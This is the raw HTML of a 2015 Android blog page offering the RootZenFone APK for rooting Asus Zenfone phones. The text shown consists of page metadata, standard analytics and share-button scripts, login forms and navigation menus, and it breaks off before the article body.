<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US" xmlns:fb="https://www.facebook.com/2008/fbml" xmlns:addthis="https://www.addthis.com/help/api-spec"> <!--<![endif]-->
<head>
<title>Download RootZenFone 1.4.6.4r APK [free] | Ninja Romeo</title>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="pingback" href="http://www.ninjaromeo.com/xmlrpc.php" />
<meta property="og:image" content="http://www.ninjaromeo.com/wp-content/uploads/2015/05/ROOT-ZenFone-APK.jpg" /><meta name="author" content="Panneer Selvan">

<link rel="author" href="https://plus.google.com/+PanneerScullyBoySelvan/" />
<meta name="keywords" content="download root zenfone apk,rootzenfone app,download apk,root,zenfone 4,zenfone 5,zenfone 6,asus" />
<link rel="canonical" href="http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/" />
<script type="text/javascript">
				window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
				ga('create', 'UA-26719002-1', 'auto');
				// Plugins
				ga('require', 'outboundLinkTracker');
				ga('send', 'pageview');
			</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
<script async src="https://cdnjs.cloudflare.com/ajax/libs/autotrack/2.4.0/autotrack.js"></script>

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Ninja Romeo &raquo; Feed" href="http://www.ninjaromeo.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Ninja Romeo &raquo; Comments Feed" href="http://www.ninjaromeo.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Ninja Romeo &raquo; Download Root ZenFone 1.4.6.4r APK [free] Comments Feed" href="http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/feed/" />
<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.ninjaromeo.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.4"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,56826,8203,55356,56819),0,0),c=j.toDataURL(),b!==c&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55358,56794,8205,9794,65039),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55358,56794,8203,9794,65039),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='contact-form-7-css' href='http://www.ninjaromeo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9.1' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css' href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C900%2C500italic%2C400%2C300&#038;ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css' href='http://fonts.googleapis.com/css?family=Open+Sans%3A400%2C700&#038;ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='addthis_all_pages-css' href='http://www.ninjaromeo.com/wp-content/plugins/addthis/frontend/build/addthis_wordpress_public.min.css?ver=4.8.4' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css' href='http://www.ninjaromeo.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css' href='http://www.ninjaromeo.com/wp-content/themes/Newspaper2/style.css?ver=7.6' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-demo-style-css' href='http://www.ninjaromeo.com/wp-content/themes/Newspaper2/includes/demos/tech/demo_style.css?ver=7.6' type='text/css' media='all' />
<script type='text/javascript' src='http://www.ninjaromeo.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.ninjaromeo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://www.ninjaromeo.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.ninjaromeo.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.ninjaromeo.com/wp-includes/wlwmanifest.xml" />
<link rel='prev' title='Download LG G4 Apps for LG G3 with Ported APK ZIP [How to Install]' href='http://www.ninjaromeo.com/download-lg-g4-apps-g3-ported-apk-zip/' />
<link rel='next' title='Unroot Asus Zenfone 4, 5 &#038; 6 without Computer using Root Zenfone app' href='http://www.ninjaromeo.com/unroot-asus-zenfone-4-5-6-without-computer/' />
<meta name="generator" content="WordPress 4.8.4" />
<link rel='shortlink' href='http://www.ninjaromeo.com/?p=4433' />
<link rel="alternate" type="application/json+oembed" href="http://www.ninjaromeo.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.ninjaromeo.com%2Fdownload-root-zenfone-1-4-6-4r-apk%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.ninjaromeo.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.ninjaromeo.com%2Fdownload-root-zenfone-1-4-6-4r-apk%2F&#038;format=xml" />

<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/" />
<meta property="og:site_name" content="Ninja Romeo" />
<meta property="og:title" content="Download Root ZenFone 1.4.6.4r APK [free]" />
<meta property="article:author" content="http://facebook.com/tpanneer" />
<meta property="og:description" content="RootZenFone 1.4.6.4r APK will give you an access to root the Asus Zenfone models like Zenfone 4, Zenfone 5, Zenfone 6. You can easily root the Asus mobiles with(...)" />
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="http://twitter.com/ninjaromeo">
<meta name="twitter:creator" content="http://twitter.com/ninjaromeo">
<meta name="twitter:url" content="http://www.ninjaromeo.com/download-root-zenfone-1-4-6-4r-apk/">
<meta name="twitter:title" content="Download Root ZenFone 1.4.6.4r APK [free]">
<meta name="twitter:description" content="RootZenFone 1.4.6.4r APK will give you an access to root the Asus Zenfone models like Zenfone 4, Zenfone 5, Zenfone 6. You can easily root the Asus mobiles with(...)">
<link rel="author" href="https://plus.google.com/+PanneerScullyBoySelvan/" />
<link rel="publisher" href="https://plus.google.com/+PanneerScullyBoySelvan/" />
<meta name="DC.Title" content="Download Root ZenFone 1.4.6.4r APK [free]"><meta name="DC.Creator" content="https://plus.google.com/+PanneerScullyBoySelvan/"><meta name="DC.Description" content="RootZenFone 1.4.6.4r APK will give you an access to root the Asus Zenfone models like Zenfone 4, Zenfone 5, Zenfone 6. You can easily root the Asus mobiles with(...)"><meta name="DC.Date" content="2015-05-09 10:02:13"><meta name="DC.Type" content="Article"><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
<meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress." />
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.ninjaromeo.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]-->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

            if( -1 !== navigator.userAgent.indexOf('IEMobile') ){
                htmlTag.className += ' td-md-is-iemobile';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var tds_login_sing_in_widget="show";
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_ajax_url="http:\/\/www.ninjaromeo.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=7.6";
var td_get_template_directory_uri="http:\/\/www.ninjaromeo.com\/wp-content\/themes\/Newspaper2";
var tds_snap_menu="";
var tds_logo_on_sticky="";
var tds_header_style="8";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var tdsDateFormat="l, F j, Y";
var tdDateNamesI18n={"month_names":["January","February","March","April","May","June","July","August","September","October","November","December"],"month_names_short":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"day_names":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"day_names_short":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"]};
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>
<script data-cfasync="false" type="text/javascript">if (window.addthis_product === undefined) { window.addthis_product = "wpp"; } if (window.wp_product_version === undefined) { window.wp_product_version = "wpp-6.1.1"; } if (window.wp_blog_version === undefined) { window.wp_blog_version = "4.8.4"; } if (window.addthis_share === undefined) { window.addthis_share = {}; } if (window.addthis_config === undefined) { window.addthis_config = {"data_track_clickback":true,"ignore_server_config":true,"ui_atversion":300}; } if (window.addthis_layers === undefined) { window.addthis_layers = {}; } if (window.addthis_layers_tools === undefined) { window.addthis_layers_tools = [{"sharetoolbox":{"numPreferredServices":5,"counts":"one","size":"32px","style":"fixed","shareCountThreshold":0,"elements":".addthis_inline_share_toolbox_below,.at-below-post,.at-below-post-page"}}]; } else { window.addthis_layers_tools.push({"sharetoolbox":{"numPreferredServices":5,"counts":"one","size":"32px","style":"fixed","shareCountThreshold":0,"elements":".addthis_inline_share_toolbox_below,.at-below-post,.at-below-post-page"}});  } if (window.addthis_plugin_info === undefined) { window.addthis_plugin_info = {"info_status":"enabled","cms_name":"WordPress","plugin_name":"Share Buttons by AddThis","plugin_version":"6.1.1","plugin_mode":"WordPress","anonymous_profile_id":"wp-6fa96d6843233fa8f13cbf702f2a2663","page_info":{"template":"posts","post_type":""},"sharing_enabled_on_post_via_metabox":false}; } 
                    (function() {
                      var first_load_interval_id = setInterval(function () {
                        if (typeof window.addthis !== 'undefined') {
                          window.clearInterval(first_load_interval_id);
                          if (typeof window.addthis_layers !== 'undefined' && Object.getOwnPropertyNames(window.addthis_layers).length > 0) {
                            window.addthis.layers(window.addthis_layers);
                          }
                          if (Array.isArray(window.addthis_layers_tools)) {
                            for (i = 0; i < window.addthis_layers_tools.length; i++) {
                              window.addthis.layers(window.addthis_layers_tools[i]);
                            }
                          }
                        }
                     },1000)
                    }());
                </script> <script data-cfasync="false" type="text/javascript" src="https://s7.addthis.com/js/300/addthis_widget.js#pubid=wp-6fa96d6843233fa8f13cbf702f2a2663" async="async"></script><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>
<body class="post-template-default single single-post postid-4433 single-format-standard download-root-zenfone-1-4-6-4r-apk wpb-js-composer js-comp-ver-5.0.1 vc_responsive td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">
<div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
<div class="td-menu-background"></div>
<div id="td-mobile-nav">
<div class="td-mobile-container">

<div class="td-menu-socials-wrap">

<div class="td-menu-socials">
<span class="td-social-icon-wrap">
<a target="_blank" href="http://facebook.com/ninjaromeo" title="Facebook">
<i class="td-icon-font td-icon-facebook"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="http://twitter.com/ninjaromeo" title="Twitter">
<i class="td-icon-font td-icon-twitter"></i>
</a>
</span> </div>

<div class="td-mobile-close">
<a href="#"><i class="td-icon-close-mobile"></i></a>
</div>
</div>

<div class="td-menu-login-section">
<div class="td-guest-wrap">
<div class="td-menu-avatar"><div class="td-avatar-container"></div></div>
<div class="td-menu-login"><a id="login-link-mob">Sign in</a></div>
</div>
</div>

<div class="td-mobile-content">
<div class="menu-trending-phones-container"><ul id="menu-trending-phones" class="td-mobile-main-menu"><li id="menu-item-1236" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first menu-item-1236"><a title="LG Phones" href="http://www.ninjaromeo.com/category/lg/">LG</a></li>
<li id="menu-item-1237" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1237"><a title="Samsung Phones" href="http://www.ninjaromeo.com/category/samsung/">Samsung</a></li>
<li id="menu-item-2065" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2065"><a href="http://www.ninjaromeo.com/category/htc/">HTC</a></li>
<li id="menu-item-2068" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2068"><a href="http://www.ninjaromeo.com/category/sony/">Sony</a></li>
<li id="menu-item-747" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-747"><a title="Guides for you" href="http://www.ninjaromeo.com/category/how-to-guide/">How to Guide<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
<li id="menu-item-0" class="menu-item-0"><a href="http://www.ninjaromeo.com/category/how-to-guide/delete-account/">Delete account</a></li>
</ul>
</li>
</ul></div> </div>
</div>

<div id="login-form-mobile" class="td-register-section">
<div id="td-login-mob" class="td-login-animation td-login-hide-mob">

 <div class="td-login-close">
<a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
<div class="td-login-title">Sign in</div>

<div class="td-mobile-close">
<a href="#"><i class="td-icon-close-mobile"></i></a>
</div>
</div>
<div class="td-login-form-wrap">
<div class="td-login-panel-title"><span>Welcome!</span>Log into your account</div>
<div class="td_display_err"></div>
<div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email-mob" value="" required><label>your username</label></div>
<div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass-mob" value="" required><label>your password</label></div>
<input type="button" name="login_button" id="login_button-mob" class="td-login-button" value="LOG IN">
<div class="td-login-info-text"><a href="#" id="forgot-pass-link-mob">Forgot your password?</a></div>
</div>
</div>
<div id="td-forgot-pass-mob" class="td-login-animation td-login-hide-mob">

<div class="td-forgot-pass-close">
<a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
<div class="td-login-title">Password recovery</div>
</div>
<div class="td-login-form-wrap">
<div class="td-login-panel-title">Recover your password</div>
<div class="td_display_err"></div>
<div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email-mob" value="" required><label>your email</label></div>
<input type="button" name="forgot_button" id="forgot_button-mob" class="td-login-button" value="Send My Pass">
</div>
</div>
</div>
</div> <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
<form method="get" class="td-search-form" action="http://www.ninjaromeo.com/">

<div class="td-search-close">
<a href="#"><i class="td-icon-close-mobile"></i></a>
</div>
<div role="search" class="td-search-input">
<span>Search</span>
<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
</div>
</form>
<div id="td-aj-search-mob"></div>
</div>
</div>
<div id="td-outer-wrap">

<div class="td-header-wrap td-header-style-8">
<div class="td-container">
<div class="td-header-sp-logo">
<a class="td-main-logo" href="http://www.ninjaromeo.com/">
<img src="https://www.ninjaromeo.com/wp-content/uploads/2016/09/Logo-new.png" alt="" />
<span class="td-visual-hidden">Ninja Romeo</span>
</a>
</div>
</div>
<div class="td-header-top-menu-full">
<div class="td-container">
<div class="td-header-row td-header-top-menu">
<div class="top-bar-style-1">
<div class="td-header-sp-top-menu">
 <div class="td-weather-top-widget" id="td_top_weather_uid">
<i class="td-icons few-clouds-d"></i>
<div class="td-weather-now" data-block-uid="td_top_weather_uid">
<span class="td-big-degrees">28</span>
<span class="td-weather-unit">C</span>
</div>
<div class="td-weather-header">
<div class="td-weather-city">Chennai,India</div>
</div>
</div>
<div class="td_data_time">
<div style="visibility:hidden;">
Sunday, December 17, 2017
</div>
</div>
<ul class="top-header-menu td_ul_login"><li class="menu-item"><a class="td-login-modal-js menu-item" href="#login-form" data-effect="mpf-td-login-effect">Sign in / Join</a><span class="td-sp-ico-login td_sp_login_ico_style"></span></li></ul></div>
<div class="td-header-sp-top-widget">
<span class="td-social-icon-wrap">
<a target="_blank" href="http://facebook.com/ninjaromeo" title="Facebook">
<i class="td-icon-font td-icon-facebook"></i>
</a>
</span>
<span class="td-social-icon-wrap">
<a target="_blank" href="http://twitter.com/ninjaromeo" title="Twitter">
<i class="td-icon-font td-icon-twitter"></i>
</a>
</span></div>
</div>

<div id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
<div class="td-login-wrap">
<a href="#" class="td-back-button"><i class="td-icon-modal-back"></i></a>
<div id="td-login-div" class="td-login-form-div td-display-block">
<div class="td-login-panel-title">Sign in</div>
<div class="td-login-panel-descr">Welcome! Log into your account</div>
<div class="td_display_err"></div>
<div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email" value="" required><label>your username</label></div>
<div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" required><label>your password</label></div>
<input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Login">
<div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password? Get help</a></div>
</div>
<div id="td-forgot-pass-div" class="td-login-form-div td-display-none">
<div class="td-login-panel-title">Password recovery</div>
<div class="td-login-panel-descr">Recover your password</div>
<div class="td_display_err"></div>
<div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email" value="" required><label>your email</label></div>
<input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Password">
<div class="td-login-info-text">A password will be e-mailed to you.</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="td-header-menu-wrap-full">
<div class="td-header-menu-wrap td-header-gradient">
<div class="td-container">
<div class="td-header-row td-header-main-menu">
<div id="td-header-menu" role="navigation">
<div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
<div class="td-main-menu-logo td-logo-in-header">
<a class="td-main-logo" href="http://www.ninjaromeo.com/">
<img src="https://www.ninjaromeo.com/wp-content/uploads/2016/09/Logo-new.png" alt="" />
</a>
</div>
<div class="menu-trending-phones-container"><ul id="menu-trending-phones-1" class="sf-menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-mega-menu menu-item-1236"><a title="LG Phones" href="http://www.ninjaromeo.com/category/lg/">LG</a>
<ul class="sub-menu">
<li class="menu-item-0"><div class="td-container-border"><div class="td-mega-grid"><div class="td_block_wrap td_block_mega_menu td_uid_1_5a35de9c6729e_rand td-no-subcats td_with_ajax_pagination td-pb-border-top" data-td-block-uid="td_uid_1_5a35de9c6729e"><script>var block_td_uid_1_5a35de9c6729e = new tdBlock();
block_td_uid_1_5a35de9c6729e.id = "td_uid_1_5a35de9c6729e";
block_td_uid_1_5a35de9c6729e.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"86","category_ids":"","custom_title":"","custom_url":"","show_child_cat":30,"sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_category_ids_filter","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_1_5a35de9c6729e_rand","el_class":"","offset":"","css":"","tdc_css":"","tdc_css_class":"td_uid_1_5a35de9c6729e_rand","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_1_5a35de9c6729e.td_column_number = "3";
block_td_uid_1_5a35de9c6729e.block_type = "td_block_mega_menu";
block_td_uid_1_5a35de9c6729e.post_count = "5";
block_td_uid_1_5a35de9c6729e.found_posts = "61";
block_td_uid_1_5a35de9c6729e.header_color = "";
block_td_uid_1_5a35de9c6729e.ajax_pagination_infinite_stop = "";
block_td_uid_1_5a35de9c6729e.max_num_pages = "13";
tdBlocksArray.push(block_td_uid_1_5a35de9c6729e);
</script><div id=td_uid_1_5a35de9c6729e class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/best-lg-phones-buy-2017/" rel="bookmark" title="The Best LG Phones to Buy in 2017"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2017/09/lg-logo-image-218x150.png" srcset="http://www.ninjaromeo.com/wp-content/uploads/2017/09/lg-logo-image-218x150.png 218w, http://www.ninjaromeo.com/wp-content/uploads/2017/09/lg-logo-image-100x70.png 100w" sizes="(max-width: 218px) 100vw, 218px" alt="best lg mobiles in 2017" title="The Best LG Phones to Buy in 2017" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/best-lg-phones-buy-2017/" rel="bookmark" title="The Best LG Phones to Buy in 2017">The Best LG Phones to Buy in 2017</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/marshmallow-ota-update-lg-g4-g3/" rel="bookmark" title="How to Install Android 6.0 Marshmallow official OTA Update on LG G4 and LG G3"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/10/lg-g3-g4-android-marshmallow-update-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2015/10/lg-g3-g4-android-marshmallow-update-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2015/10/lg-g3-g4-android-marshmallow-update-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="Install update download Android 6.0 Marshmallow on LG G4 and LG G3" title="How to Install Android 6.0 Marshmallow official OTA Update on LG G4 and LG G3" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/marshmallow-ota-update-lg-g4-g3/" rel="bookmark" title="How to Install Android 6.0 Marshmallow official OTA Update on LG G4 and LG G3">How to Install Android 6.0 Marshmallow official OTA Update on LG&#8230;</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/install-marshmallow-rom-lg-g3-ported/" rel="bookmark" title="How to Install Android 6.0 Marshmallow ROM on LG G3 [Ported from Nexus 6]"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/09/lg-g3-android-marshmallow-rom-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2015/09/lg-g3-android-marshmallow-rom-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2015/09/lg-g3-android-marshmallow-rom-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="LG G3 install android 6.0 marshmallow rom ported from nexus 6" title="How to Install Android 6.0 Marshmallow ROM on LG G3 [Ported from Nexus 6]" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/install-marshmallow-rom-lg-g3-ported/" rel="bookmark" title="How to Install Android 6.0 Marshmallow ROM on LG G3 [Ported from Nexus 6]">How to Install Android 6.0 Marshmallow ROM on LG G3 [Ported&#8230;</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/best-games-lg-g4/" rel="bookmark" title="5 Best Games for LG G4 (Top HD Graphics) &#8211; You won&#8217;t left your phone alone"><img width="218" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/08/games-for-lg-g4-218x150.jpg" srcset="http://www.ninjaromeo.com/wp-content/uploads/2015/08/games-for-lg-g4-218x150.jpg 218w, http://www.ninjaromeo.com/wp-content/uploads/2015/08/games-for-lg-g4-100x70.jpg 100w" sizes="(max-width: 218px) 100vw, 218px" alt="Best games for lg g4 - top graphics" title="5 Best Games for LG G4 (Top HD Graphics) &#8211; You won&#8217;t left your phone alone" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/best-games-lg-g4/" rel="bookmark" title="5 Best Games for LG G4 (Top HD Graphics) &#8211; You won&#8217;t left your phone alone">5 Best Games for LG G4 (Top HD Graphics) &#8211; You&#8230;</a></h3> </div>
</div>
</div><div class="td-mega-span">
<div class="td_module_mega_menu td_mod_mega_menu">
<div class="td-module-image">
<div class="td-module-thumb"><a href="http://www.ninjaromeo.com/lg-g4-case-india/" rel="bookmark" title="LG G4 Case &#8211; Best in India to buy"><img width="188" height="150" class="entry-thumb" src="http://www.ninjaromeo.com/wp-content/uploads/2015/07/enthopia-lg-g4-karma-is-like-69-red-188x150.jpg" alt="enthopia lg g4 karma 69 red color" title="LG G4 Case &#8211; Best in India to buy" /></a></div> </div>
<div class="item-details">
<h3 class="entry-title td-module-title"><a href="http://www.ninjaromeo.com/lg-g4-case-india/" rel="bookmark" title="LG G4 Case &#8211; Best in India to buy">LG G4 Case &#8211; Best in India to buy</a></h3> </div>
</div>
